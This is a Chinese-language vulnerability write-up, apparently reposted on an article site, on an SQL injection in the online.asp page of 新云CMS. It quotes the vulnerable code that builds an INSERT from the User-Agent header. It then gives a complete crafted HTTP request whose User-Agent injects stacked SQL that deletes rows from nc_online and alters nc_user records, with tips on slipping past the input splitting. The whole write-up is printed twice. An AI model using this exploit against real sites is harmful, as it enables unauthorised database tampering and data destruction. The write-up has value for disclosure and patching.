新云CMS Online.asp页面过滤不严导致SQL注入漏洞
程序员文章站
2022-09-30 13:59:13
受影响系统:
最新版本
漏洞文件:
/inc/online.asp
代码分析如下:
OnlineSQL = "INSERT INTO NC_Online(id,ChannelID,username,identitys,station,ip,browser... 08-10-08...
受影响系统:
最新版本
漏洞文件:
/inc/online.asp
代码分析如下:
onlinesql = "insert into nc_online(id,channelid,username,identitys,station,ip,browser,starttime,lasttime,userid,strreferer) values (" & usersessionid & "," & cid & ",'" & strusername & "','" & stridentitys & "','" & currentstation & "','" & remoteaddr & "','" & browsertype.platform&"|"&browsertype.browser&browsertype.version & "|"&browsertype.alexatoolbar&"'," & nowstring & "," & nowstring & "," & userid & ",'" & strreferer & "')" //第69行
。。。。。。
agent = request.servervariables("http_user_agent") //第99行
。。。。。。
elseif left(agent, 5) = "opera" then '有此标识为浏览器 //第162行
agent = split(agent, "/")
browser = "mozilla "
tmpstr = split(agent(1), " ")
version = tmpstr(0)
http_user_agent我们可以控制,则version变量我们就可以控制了。
构造数据包如下:
post /inc/online.asp http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
referer: http://localhost/xx.htm
accept-language: zh-cn
ua-cpu: x86
accept-encoding: gzip, deflate
user-agent: opera/haha',2008,2009,11111,'');delete from nc_online;update[nc_user]set[buycode]=7;--
host: localhost
connection: keep-alive
cookie: aspsessionidaabbcrrs=ffgndbddkjlfadogomklbgpf
成功执行sql语句
注意的地方:
1. 在两次分割成数组的时候是以"/"和" ",所以构造的sql语句时使用的间隔符就不能用/**/和空格,上面是使用tab键弄出来的空格。
2. 一定要加上delete from nc_online,不然下次程序就不执行insert语句,而改成执行update语句了。
最新版本
漏洞文件:
/inc/online.asp
代码分析如下:
onlinesql = "insert into nc_online(id,channelid,username,identitys,station,ip,browser,starttime,lasttime,userid,strreferer) values (" & usersessionid & "," & cid & ",'" & strusername & "','" & stridentitys & "','" & currentstation & "','" & remoteaddr & "','" & browsertype.platform&"|"&browsertype.browser&browsertype.version & "|"&browsertype.alexatoolbar&"'," & nowstring & "," & nowstring & "," & userid & ",'" & strreferer & "')" //第69行
。。。。。。
agent = request.servervariables("http_user_agent") //第99行
。。。。。。
elseif left(agent, 5) = "opera" then '有此标识为浏览器 //第162行
agent = split(agent, "/")
browser = "mozilla "
tmpstr = split(agent(1), " ")
version = tmpstr(0)
http_user_agent我们可以控制,则version变量我们就可以控制了。
构造数据包如下:
post /inc/online.asp http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
referer: http://localhost/xx.htm
accept-language: zh-cn
ua-cpu: x86
accept-encoding: gzip, deflate
user-agent: opera/haha',2008,2009,11111,'');delete from nc_online;update[nc_user]set[buycode]=7;--
host: localhost
connection: keep-alive
cookie: aspsessionidaabbcrrs=ffgndbddkjlfadogomklbgpf
成功执行sql语句
注意的地方:
1. 在两次分割成数组的时候是以"/"和" ",所以构造的sql语句时使用的间隔符就不能用/**/和空格,上面是使用tab键弄出来的空格。
2. 一定要加上delete from nc_online,不然下次程序就不执行insert语句,而改成执行update语句了。
下一篇: Z-blog后台拿SHELL方法总结